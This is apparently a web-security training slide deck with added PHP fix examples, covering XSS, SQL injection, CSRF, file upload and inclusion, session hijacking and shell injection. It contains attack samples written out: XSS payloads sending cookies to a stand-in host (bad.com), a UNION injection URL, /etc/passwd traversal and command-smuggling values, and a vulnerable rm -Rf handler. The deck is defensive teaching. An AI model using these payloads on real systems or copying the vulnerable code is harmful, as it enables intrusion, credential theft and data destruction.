Web Application Security DOs and DON’Ts
While you do not know attacks, how can you know about defense?
http://web.folio3.com/services/web-application-development/
2. Web Application Security
It's a vast topic.
While you do not know attacks, how can you know about defense?
High level and common vulnerabilities
How to avoid these?
@folio_3 www.folio3.com Copyright 2015
3. It is Important
75% of cyber attacks and internet security violations are generated through Internet applications.
Source: Gartner Group
4. Vulnerabilities are common!
iViZ Security study (2012) shows:
- 99% of the apps tested had at least 1 vulnerability
- 82% of the web applications had at least 1 High/Critical vulnerability
- 90% of hacking incidents never become known to the public
- Average number of vulnerabilities per website: 35
- 30% of the hacked organizations knew beforehand about the vulnerability for which they got hacked
- #1 vulnerability: Cross site scripting (61%)
5. Top Vulnerabilities
Bar chart: percentage of websites containing the vulnerability
- Cross Site Scripting: 65%
- Information Leakage: 51%
- Cross Site Request Forgery: 25%
7. Cross-Site Scripting (XSS)
An attacker can inject executable code (JS, HTML, etc.) into a webpage.
Example:
http://site.com/search.php?q=<script>alert("XSS")</script>
<script src="http://bad.com/xss.js"></script>
Types:
- Non-Persistent
- Persistent
8. Cross-Site Scripting (XSS)
Non-Persistent (reflected)
The payload travels in the request (URL or form field) and is echoed straight back into the response. Nothing is stored on the website, so each victim has to be sent the crafted link.
Example
http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script>
Or
http://www.site.com/viewtopic.php?id=4"><script>document.write("<img src='http://bad.com/logger.php?cookie="+document.cookie+"'/>");</script>
9. Cross-Site Scripting (XSS)
Persistent (stored)
Attacker stores executable code in the website database, and it is executed every time a webpage shows that data.
Common targets: comments, user submitted content, signup forms, etc.
11. Cross-Site Scripting (XSS)
Comment in raw format:
and I like the way this website developers work..hahaha :D :D
<script src="http://bad.com/xss.js"></script>
Should have been printed (HTML-escaped, so the browser shows the tag as text instead of running it) like:
&lt;script src=&quot;http://bad.com/xss.js&quot;&gt;&lt;/script&gt;
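The escaping that slide 11 asks for, as an added example (not code from the original slides): the stored comment is rendered once unescaped and once through htmlspecialchars(), and the same value is also placed into an attribute and into a script block, each with the encoding that context needs. The comment text is constructed for the demo.

```php
<?php
// Added example (not from the original slides): encoding user-supplied text
// for the HTML context it is written into. $comment is constructed here; in
// the real site it would come from the database or a form field.
declare(strict_types=1);

function escapeHtml(string $value): string
{
    // ENT_QUOTES escapes both quote characters, so the result is also safe
    // inside attribute values delimited by ' or ".
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function escapeForJs(string $value): string
{
    // Inside a <script> block the value becomes a JSON string literal with
    // <, >, &, ' and " hex-escaped, so it cannot close the script element.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

$comment = 'and I like the way this website developers work..hahaha :D :D '
         . '<script src="http://bad.com/xss.js"></script>';

// Vulnerable: the stored <script> tag is copied into the page verbatim.
$vulnerable = "<p>$comment</p>";

// Fixed: element content, attribute value and script block each get
// the encoding for their own context.
$safeHtml = '<p>' . escapeHtml($comment) . '</p>';
$safeAttr = '<input type="text" value="' . escapeHtml($comment) . '">';
$safeJs   = '<script>var lastComment = ' . escapeForJs($comment) . ';</script>';

echo $vulnerable, PHP_EOL;
echo $safeHtml, PHP_EOL;
echo $safeAttr, PHP_EOL;
echo $safeJs, PHP_EOL;
```

The rule to take away: escape at output time, for the exact context the value lands in. Escaping once on input (or stripping tags) cannot know whether the value will later sit in a text node, an attribute or a script, and a value that is safe in one of those is not automatically safe in the others.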
13. Information Leakage
An application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.
Example
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: YES) in /usr/www/kint/view.php on line 8
Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20
The first message gives away the database user and the absolute path of the script; the second confirms to the attacker that the include path is built from his input, so the traversal probe is on the right track.
14. Information Leakage
- Faulty directory listing configuration: all files in the directory are visible
- Improper error handling: error messages may contain paths, user and server info; specifically in PHP the file path is revealed
- Filetype handling
- HTTP headers: X-Powered-By, X-Generator, etc.
- Sensitive HTML comments, etc.
15. Information Leakage
Directory listing configuration
- Put a blank file named index.html in that directory.
- Disable indexing in .htaccess:
  Options -Indexes
  All sub-directories of that directory will also get their directory listings turned off.
Error handling
- Configure error messages using error_reporting, display_errors, log_errors and error_log in php.ini (in production: display_errors off, log_errors on, error_log pointing outside the web root)
- Configure error handling in .htaccess as well (php_flag display_errors off)
16. Information Leakage
Remove headers which reveal information
- X-Powered-By, X-Generator, etc.
- Use the header_remove() PHP function. expose_php = Off in php.ini stops PHP from sending X-Powered-By at all; the web server's own Server header has to be configured in the web server, not in PHP.
Comments in source
- Never put much information in HTML or JS comments
- Comments should be in PHP so that they are not visible to the visitor
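The error handling from slide 15 and the header removal from slide 16 together, as an added example (not code from the original slides): full detail goes to a log file, the visitor gets a generic page, and PHP warnings are routed through the same path so no "Warning: ... in /usr/www/... on line N" text ever reaches the browser. The log path and the failing database connection are assumptions made for the demo.

```php
<?php
// Added example (not from the original slides): production error handling.
// The log path is an assumption; it must be writable by the web server and
// must not be inside the document root.
declare(strict_types=1);

ini_set('display_errors', '0');                     // never print errors into the response
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app-errors.log'); // assumed path
error_reporting(E_ALL);                             // still record everything in the log

// Drop the header that names the PHP version (expose_php = Off does the same).
header_remove('X-Powered-By');

function logAndHide(Throwable $e): void
{
    // Class, message, file and line go to the log only.
    error_log(sprintf('%s: %s in %s:%d',
        get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    // The browser sees a status code and a fixed message, nothing from the exception.
    http_response_code(500);
    echo 'Something went wrong. Please try again later.', PHP_EOL;
}

// Uncaught exceptions take this path.
set_exception_handler('logAndHide');

// Warnings and notices are converted to exceptions so they take the same path
// instead of being printed with the script's absolute path.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline) {
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});

// Simulated failure of the kind shown on slide 13: a bad database login.
try {
    $pdo = new PDO('mysql:host=localhost;dbname=kint', 'root', 'wrong-password'); // assumed DSN
} catch (PDOException $e) {
    // "Access denied for user 'root'@'localhost'" is written to the log, not to the page.
    logAndHide($e);
}
```

When run from the command line the script writes the connection failure to the configured log (or to stderr if the path is not writable) and prints only the generic message.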
17. Information Leakage
Filetypes
Never keep files which can be downloaded in a public directory, unless they are meant for the public:
- Include files (.inc, .class, .db, etc.)
- Compressed files (.zip, .rar, .tar.gz, etc.)
- Database files (.sql, .csv, .xml, .xls, etc.)
- Unknown files (.bak, .inc, .copy, .bkp, etc.)
Configure .htaccess (the dot in the pattern has to be escaped, or it matches any character):
  <Files ~ "\.(inc|sql)$">
  order allow,deny
  deny from all
  </Files>
On Apache 2.4 the two order/deny lines are replaced by: Require all denied
18. SQL Injection
Attacker is able to inject custom SQL into a query.
Example
http://site.com/product.php?id=10+AND+1=2+union+select+1,2,database(),version(),user(),6+--
19. SQL Injection
Select id, meta_title, name, details, category, metadescription WHERE id = 10 and deleted = 0
becomes
Select id, meta_title, name, details, category, metadescription WHERE id = 10 and 1=2 UNION select 1,2, database(), version(), user(), 6 -- and deleted = 0
The "1=2" empties the original result set, the UNION appends a row whose columns 3 to 5 carry the database name, server version and database user, and the trailing "--" comments out the rest of the original WHERE clause. The injected SELECT has to produce the same number of columns (six) as the original query.
21. SQL Injection
- Escape the input: mysql_real_escape_string() (the mysql_* extension was removed in PHP 7; mysqli_real_escape_string() or PDO::quote() replace it), filter_var(), intval()/floatval() for numbers
- Filter input (use whitelists, not blacklists)
- Use prepared statements / parameterized queries. Most frameworks/CMSs have them. This is the primary defence; escaping is only a fallback, and it does nothing for a value that is not inside quotes in the query (a bare numeric id such as the one above).
- Limit database permissions (start with the lowest permissions)
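The product lookup from slides 18 and 19 done both ways, as an added example (not code from the original slides): once by pasting the id into the SQL text, once as a prepared statement. It uses an in-memory SQLite table constructed in the script so it runs offline; the table name and columns are assumptions, and sqlite_version() stands in for MySQL's database()/version()/user().

```php
<?php
// Added example (not from the original slides): string-built query versus
// prepared statement, against a constructed in-memory SQLite table.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE products (id INTEGER, name TEXT, details TEXT, deleted INTEGER)');
$pdo->exec("INSERT INTO products VALUES (10, 'Widget', 'public item', 0),
                                        (11, 'Secret', 'hidden item', 1)");

// Vulnerable: $id becomes part of the SQL text, so the attacker rewrites the query.
function findProductVulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT id, name, details FROM products WHERE id = $id AND deleted = 0";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value is bound as a parameter and is never parsed as SQL.
// The (int) cast is the intval() check from slide 21; for text columns the
// bound parameter alone is the protection.
function findProductSafe(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT id, name, details FROM products WHERE id = :id AND deleted = 0');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker inputs, as they would arrive in ?id=...
$orPayload    = '10 OR 1=1 --';
$unionPayload = '10 AND 1=2 UNION SELECT 1, sqlite_version(), 3 --'; // 3 columns, like the original SELECT

echo "vulnerable, OR payload:\n";    print_r(findProductVulnerable($pdo, $orPayload));
echo "vulnerable, UNION payload:\n"; print_r(findProductVulnerable($pdo, $unionPayload));
echo "prepared, OR payload:\n";      print_r(findProductSafe($pdo, $orPayload));
echo "prepared, UNION payload:\n";   print_r(findProductSafe($pdo, $unionPayload));
```

The string-built query returns both rows for the OR payload (the deleted one included, because "-- " has commented out "AND deleted = 0") and a row carrying the SQLite version for the UNION payload. The prepared statement returns only product 10 in both cases, because the cast turns the whole string into the integer 10 and the remainder never reaches the database.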
22. Cross-Site Request Forgery
(CSRF)
The site accepts state-changing requests that another
website caused the user's browser to send, because the browser
attaches the user's active session cookie automatically.
Example
The user is logged in to the target site (bad.com in this example)
In another tab/window the user visits a site where the attacker
has already injected his code (hacked.com)
That page silently submits a form to bad.com; a review is posted
in the user's name without his knowledge
24. Cross-Site Request Forgery
(CSRF)
Solution
Embed an unpredictable token, bound to the user's session, in each generated form
Check the token when the form is submitted (reject if missing or different)
Check the Referer header (partial protection: browsers and proxies
may strip it, so it can only be used to reject an explicit mismatch)
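A per-session anti-CSRF token as described above, embedded in every generated form and verified on submit, as an added example that is not code from the deck. It assumes PHP 7 (random_bytes) and uses the site name site.com, the field name csrf_token and the function names as my own choices.

```php
<?php
// Added example, not from the deck: session-bound CSRF token for the
// "post a review" form. Assumption: this site is served as site.com.

declare(strict_types=1);

const SITE_HOST = 'site.com';   // assumed host of the protected site

session_start();

// One token per session, created lazily. Rotate it on login/logout together
// with session_regenerate_id(), so a fixated session cannot carry a known token.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to drop into every generated form.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison: an ordinary string compare would leak the token
// byte by byte through timing.
function csrfValid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// --- Handling the review submission ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Partial second check from the slide: Origin (or Referer) header.
    // The token check above is the real gate; this only rejects an explicit
    // mismatch and deliberately lets an absent header through, because
    // browsers and proxies may strip it for legitimate users.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin !== '' && parse_url($origin, PHP_URL_HOST) !== SITE_HOST) {
        http_response_code(403);
        exit('Cross-origin form post rejected');
    }
    // ... store $_POST['review'] for the logged-in user ...
    exit('Review posted');
}
?>
<form method="post" action="/review.php">
  <textarea name="review"></textarea>
  <?= csrfField() ?>
  <button type="submit">Post review</button>
</form>
```

hacked.com can make the victim's browser send the POST with the session cookie, but it cannot read the victim's page to learn the token, so its forged request fails the hash_equals() check.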
25. Unrestricted File Upload
Allows an attacker to upload malicious files to the
server, most of the time scripts (e.g. a PHP web shell) to take control of the server.
Example (vulnerable: the client-supplied name, extension and content are used unchecked)
$usrFile = $_FILES['userfile']['name'];
$uploadFolder = "uploads/";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadFolder . $usrFile)) {
    echo "File has been successfully uploaded.";
} else {
    echo "Error. Please try again!";
}
26. Unrestricted File Upload
Solution
Whitelist the extensions which can be uploaded
Check for double extensions (shell.php.jpg)
Check the MIME type from the file content, not from the
client-supplied $_FILES['userfile']['type'] (partial solution)
Rename the file before saving (random name, never the client's)
Restrict access to uploaded files (.htaccess in the uploads
directory: deny everything by default, then allow only image
names; Apache 2.2 syntax; with mod_php also add php_flag engine off)
order deny,allow
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png)$">
order deny,allow
allow from all
</Files>
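A hardened replacement for the upload handler on the previous slide that applies all five points above, as an added example that is not code from the deck. The uploads directory, the 2 MB limit and the function name are assumptions; it requires PHP 7 (random_bytes, constant arrays) and the fileinfo extension.

```php
<?php
// Added example, not from the deck: image upload with extension whitelist,
// double-extension check, content-based MIME check, random rename and
// non-executable permissions. Assumption: uploads/ next to this script
// (better: outside the document root) and protected by the .htaccess above.

declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads/';   // assumed location
const MAX_BYTES  = 2 * 1024 * 1024;         // assumed limit

// Allowed extension => MIME type that finfo must report for the bytes.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png',  'gif'  => 'image/gif'];

// Returns the stored filename, or throws with a user-safe message.
function storeImage(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Whitelist by extension. basename() drops any path the client sent;
    // refusing a second dot catches "shell.php.jpg" style double extensions.
    $orig = basename($file['name']);
    if (substr_count($orig, '.') !== 1) {
        throw new RuntimeException('Double extension or missing extension');
    }
    $ext = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('Extension not allowed');
    }
    // Content check: finfo reads the magic bytes from the temp file, so the
    // attacker-chosen $file['type'] is ignored entirely.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }
    // Second opinion for images: the image parser must accept it.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image');
    }
    // Rename: the stored name is random, so the client never controls it.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . $name;
    // is_uploaded_file() rejects a forged tmp_name pointing at another file.
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644);                      // readable, never executable
    return $name;
}

try {
    $stored = storeImage($_FILES['userfile'] ?? []);
    echo 'File has been successfully uploaded as '
        . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Error: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

The MIME check is still only partial, as the slide says: a valid GIF can carry PHP code in its comment block. That is why the random name with a whitelisted extension and the web-server rule that refuses to execute anything in uploads/ are the controls that actually stop a web shell.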
27. File Inclusion
Allows an attacker to include a local or remote
file into the vulnerable webpage code (LFI / RFI).
EXAMPLE:
http://site.com/view.php?file=../../../../../etc/passwd
Files disclosed this way can be server configuration files,
system user information, filesystem structure, application
source code etc.; with remote inclusion the attacker's file is
executed as PHP.
30. File Inclusion
Use the open_basedir setting in php.ini to confine file access
to the application's own directories
Filter any input that reaches include/require or
file-reading functions
Use whitelisted filenames, or allow only valid
file name characters (don't allow ../, null bytes or URL schemes)
Modify the php.ini configuration file:
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off (on by default in older versions; removed entirely in PHP 5.4)
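view.php rewritten so that ?file= can only select a known template, as an added example that is not code from the deck. The templates directory, the page names and the two function names are assumptions; PHP 7 or later.

```php
<?php
// Added example, not from the deck: whitelist-based include for view.php,
// plus a canonical-path check for the case where a filename must be accepted.
// Assumption: templates live in ./templates, which is not web-accessible.

declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';

// VULNERABLE (the slide's view.php): ?file=../../../../etc/passwd walks out of
// the directory, and with allow_url_include=On, ?file=http://evil/x.txt
// fetches and executes remote code.
//   include 'templates/' . $_GET['file'];

// HARDENED, step 1: whitelist. Only known keys map to files; the client never
// supplies a path component at all.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function resolvePage(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    return TEMPLATE_DIR . '/' . PAGES[$key];
}

// Step 2 (defence in depth, when a filename really must be accepted):
// restrict to a safe character set, then confirm that the canonical path is
// still inside TEMPLATE_DIR. realpath() resolves "..", symlinks and trailing
// slashes, so a string check on the raw input alone is not sufficient.
function resolveFilename(string $name): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,64}\.php\z/', $name)) {
        return null;                                   // rejects "../", "\0", "http://"
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$target = resolvePage($_GET['file'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('No such page');
}
include $target;
```

With allow_url_include = Off, realpath() never sees a URL anyway; the regex is what makes that explicit at the application layer rather than relying on php.ini alone.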
31. Phishing
Social engineering technique to steal
confidential information through the use of a fake
login page on a look-alike domain.
EXAMPLE:
http://www.gooqle.com/accounts/ServiceLogin?service=mail
(note "gooqle" with a q in place of the g)
32. Phishing
An exact replica of the real page is served to the visitor;
the submitted data is sent to the attacker.
33. Phishing
Use HTTPS instead of HTTP
So that the user can see the details of the domain
owner in the certificate information (only certificates with validated
organisation details show this; a padlock alone proves nothing about who owns the site).
Use short URL addresses for login pages
So that users can easily recognise the login page
address.
Use a Yahoo! Sign-in Seal like system
A unique image or text chosen by the user and shown on the real
login page; a phishing site cannot reproduce it.
34. Session Hijacking
Allows unauthorized access as an authorized
user by obtaining his active session identifier (SID)
EXAMPLE (SID carried in the URL, where it ends up in logs,
Referer headers, browser history and shared links):
http://wg180.site.com/dk;jsessionid=0754aff827cfe9f7db7f48e7018ed1e6.wg180?st.cmd=userMain&tkn=8809
35. Session Hijacking
Store the SID in an HTTP cookie
Don't accept SIDs from GET and POST requests, use
cookies only:
session.use_cookies = 1
session.use_only_cookies = 1
This prevents session fixation via the URL
Regenerate the SID after login (or on each request)
Put session_regenerate_id(true); after
session_start()
Accept only SIDs generated by your own server
Set a flag such as $_SESSION['SERVER_GENERATED_SID'] when the
server creates a session and check it on every request to
identify whether the SID was created by your web server
(PHP 5.5.2 and later can do this natively with session.use_strict_mode = 1)
36. Session Hijacking
Destroy old SIDs
Keep the session timeout small
ini_set("session.cookie_lifetime", "600");
(also lower session.gc_maxlifetime, otherwise the server-side
session outlives the cookie)
Completely destroy the session on user logout
(session_destroy() plus expiring the cookie)
Use SSL/TLS for user authentication and for everything
afterwards
It prevents network sniffing of the SID; set session.cookie_secure = 1
so the cookie is never sent over plain HTTP
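A session bootstrap that implements the two slides above, as an added example that is not code from the deck. The 600 second timeout follows the slide; the "server_sid" marker, the "last_seen" key and the function names are my own choices. PHP 7 or later, served over HTTPS (cookie_secure would otherwise block the cookie).

```php
<?php
// Added example, not from the deck: hardened session start. Include it
// before session_start() is called anywhere else in the application.

declare(strict_types=1);

// Cookie-only session IDs: an ID in the URL is ignored, so a link such as
// ...;jsessionid=... or ?PHPSESSID=... can neither fixate nor leak the session.
ini_set('session.use_cookies', '1');
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Reject IDs this server never issued (PHP >= 5.5.2); the marker check
// below does the same job on older versions.
ini_set('session.use_strict_mode', '1');
// Cookie hygiene: not readable by script, not sent over plain HTTP.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
// Short lifetime on both the cookie and the server-side store.
ini_set('session.cookie_lifetime', '600');
ini_set('session.gc_maxlifetime', '600');

session_start();

// Accept only SIDs this server generated: a session without the marker was
// started with a client-supplied ID, so discard it and issue a fresh one.
if (empty($_SESSION['server_sid'])) {
    session_regenerate_id(true);              // true: delete the old session data
    $_SESSION = ['server_sid' => true, 'last_seen' => time()];
}

// Idle timeout enforced server-side, independent of the cookie's own expiry.
if (time() - ($_SESSION['last_seen'] ?? 0) > 600) {
    logout();
    exit('Session expired');
}
$_SESSION['last_seen'] = time();

// Call after the password check succeeds: new ID, old data removed, so an ID
// captured before login (or fixated by an attacker) is worthless afterwards.
function onLoginSuccess(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
}

// Complete destruction: clear the data, remove the server-side record,
// expire the cookie in the browser.
function logout(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
            $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}
```

Regenerating on every request, which the slide offers as an alternative, is stronger but breaks concurrent AJAX requests that race with the ID change; regenerating at login and at any privilege change is the usual compromise.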
37. Shell Injection
Allows an attacker to execute shell commands on
the web server.
Example
http://site.com/delete.php?file=/
<?php
//delete.php
$file = $_GET['file'];
echo 'erasing ' . $file . '<br />';
system("rm -Rf $file");
echo 'done';
?>
The request above runs "rm -Rf /"; a value such as "x; cat /etc/passwd"
would run a second command of the attacker's choice.
38. Shell Injection
Potential target functions
shell_exec(), exec(), system(), passthru(), popen(), proc_open()
and the backtick operator; eval() is the equivalent for PHP code injection
Solution
Disable the shell functions you don't use with disable_functions in
php.ini (php.ini only; it cannot be changed at runtime)
Allow only whitelisted commands and arguments to be used; prefer PHP
built-ins (unlink(), rename()) over spawning a shell at all
Use the PHP built-in functions to escape user input:
escapeshellarg() for a single argument, escapeshellcmd() for a whole command string
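delete.php from the previous slide in two hardened forms, one without a shell and one with escapeshellarg(), as an added example that is not code from the deck. The uploads directory and the function names are assumptions; PHP 7 or later.

```php
<?php
// Added example, not from the deck: safe delete.php.
// Assumption: the only directory deletions may touch is ./uploads.

declare(strict_types=1);

const DATA_DIR = __DIR__ . '/uploads';

// Resolve the request to a canonical path and refuse anything outside
// DATA_DIR. This is the whitelist: not "which characters are bad" but
// "which files are allowed to be deleted at all".
function resolveDeletable(string $userPath): ?string
{
    $base = realpath(DATA_DIR);
    // basename() drops any directory part, so "../../etc/passwd" becomes "passwd"
    // and "/" becomes "", which realpath() then resolves to DATA_DIR itself.
    $path = realpath(DATA_DIR . '/' . basename($userPath));
    if ($base === false || $path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Preferred: no shell at all. unlink() takes a path, never a command line,
// so there is nothing to inject into.
function deleteWithoutShell(string $userPath): bool
{
    $path = resolveDeletable($userPath);
    return $path !== null && unlink($path);
}

// If a shell is unavoidable, escapeshellarg() wraps the value in single
// quotes and escapes embedded quotes, so "x; cat /etc/passwd" arrives at rm
// as one literal filename. The path check is still needed: escaping stops
// command injection, it does not stop the user choosing "/" as the file.
function deleteWithShell(string $userPath): bool
{
    $path = resolveDeletable($userPath);
    if ($path === null) {
        return false;
    }
    // "--" ends option parsing, so a name starting with "-" is not an option.
    exec('rm -f -- ' . escapeshellarg($path), $output, $status);
    return $status === 0;
}

$file = $_GET['file'] ?? '';
echo 'erasing ' . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . '<br />';
if (deleteWithoutShell($file)) {
    echo 'done';
} else {
    http_response_code(400);
    echo 'refused';
}
```

For the slide's request ?file=/ both functions return false: basename('/') is empty, realpath() yields DATA_DIR itself, is_file() fails and the prefix check fails, so nothing is executed or removed.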
39. In a Nutshell
Never trust inputs
GET, POST, cookies, file uploads
Every input can be faked
Filter, sanitize and validate each input
Use whitelists
Don't allow HTML unless required
Don't expose internal information of the application
Handle exceptions
Test and monitor the application for security
Keep CMS, frameworks and plugins updated (at least
with security fixes)
40. Vulnerability Scanners
Acunetix WVS
Skipfish
AppScan
HP WebInspect
Nikto, Wikto
Netsparker
W3af
Grendel-Scan
Websecurify
Burp Suite
Uniscan
and more
Web applications are accessible and open for anyone
In many cases Source Code is OpenSource
Research Methodology
300+ Customers
5,000 + Application Security Tests
25% Apps from Asia, 40% Apps from USA and 25% from Europe
Example of information leakage https://www.google.com/search?q=%22admin+account+info%22+filetype%3Alog
http://code.jellycan.com/memcached/
1.Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.